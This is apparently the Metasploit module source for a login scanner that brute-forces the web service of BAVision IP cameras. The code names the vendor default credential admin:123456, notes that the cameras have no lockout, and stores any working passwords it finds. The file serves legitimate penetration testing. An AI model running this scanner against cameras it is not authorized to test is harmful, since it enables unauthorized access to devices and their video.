Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/bavision_cameras'
require 'metasploit/framework/credential_collection'

# Auxiliary scanner that tests credentials against the web service of a
# BAVision IP camera and hands every outcome to the framework's
# credential-reporting helpers.
#
# Per the module description, these cameras ship with admin:123456 and the web
# server does not enforce lockouts, so the device itself does not throttle
# repeated login attempts.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the TRYDEFAULT option.
  #
  # TRYDEFAULT is optional and defaults to false; when enabled, the vendor
  # default pair is queued in addition to USERNAME/PASSWORD.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BAVision IP Camera Web Server Login',
        'Description' => %q{
          This module will attempt to authenticate to an IP camera created by BAVision via the
          web service. By default, the vendor ships a default credential admin:123456 to its
          cameras, and the web server does not enforce lockouts in case of a bruteforce attack.
        },
        'Author' => ['sinn3r'],
        'License' => MSF_LICENSE
      )
    )

    register_options(
      [
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])
      ]
    )
  end

  # Returns the login scanner, building it on the first call.
  #
  # The result is cached in @scanner, so a later call returns the object built
  # for the first +ip+ even when a different address is passed.
  # NOTE(review): presumably the framework uses one module instance per host,
  # which would make the cache safe - confirm against the Scanner mixin.
  #
  # @param ip [String] address handed to the scanner as its host
  # @return [Metasploit::Framework::LoginScanner::BavisionCameras]
  def scanner(ip)
    return @scanner if @scanner

    creds = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    if datastore['TRYDEFAULT']
      # Queue the vendor default pair named in the module description.
      print_status("Default credential admin:123456 added to the credential queue for testing.")
      creds.add_public('admin')
      creds.add_private('123456')
    end

    # connection_timeout is fixed at 5 here; the other settings come from the datastore.
    scanner_options = configure_http_login_scanner(
      host: ip,
      port: datastore['RPORT'],
      cred_details: creds,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 5,
      http_username: datastore['HttpUsername'],
      http_password: datastore['HttpPassword']
    )

    @scanner = Metasploit::Framework::LoginScanner::BavisionCameras.new(scanner_options)
  end

  # Reports a credential that authenticated successfully.
  #
  # The password is passed to create_credential unmodified (private_type
  # :password) together with the current workspace id, so whatever backs that
  # workspace ends up holding a working device password.
  #
  # @param ip [String] address of the service
  # @param port [Integer] TCP port of the service
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The service keys are appended last, matching a merge onto the credential fields.
    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
      **service_data
    }

    login_data = {
      core: create_credential(credential_data),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service_data
    }

    create_credential_login(login_data)
  end

  # Passes a failed attempt to invalidate_login with its status and proof.
  #
  # @param ip [String] address of the service
  # @param rport [Integer] TCP port of the service (shadows the rport helper here)
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_bad_cred(ip, rport, result)
    cred = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: cred.public,
      private: cred.private,
      realm_key: cred.realm_key,
      realm_value: cred.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the scan against +ip+ and reports each result by status.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; a result with
  # any other status produces no output and no report.
  #
  # @param ip [String] address being tested
  def bruteforce(ip)
    scanner(ip).scan! do |result|
      case result.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        # A connection failure is also sent to report_bad_cred, so the
        # credential is passed to invalidate_login with this status.
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when Metasploit::Model::Login::Status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Per-host entry point: runs the scan only when check_setup succeeds.
  #
  # When check_setup is falsy the host is skipped with an error message and no
  # login attempt is made.
  #
  # @param ip [String] address being tested
  def run_host(ip)
    return bruteforce(ip) if scanner(ip).check_setup

    print_brute(level: :error, ip: ip, msg: 'Target is not BAVision IP camera web server.')
    nil
  end
end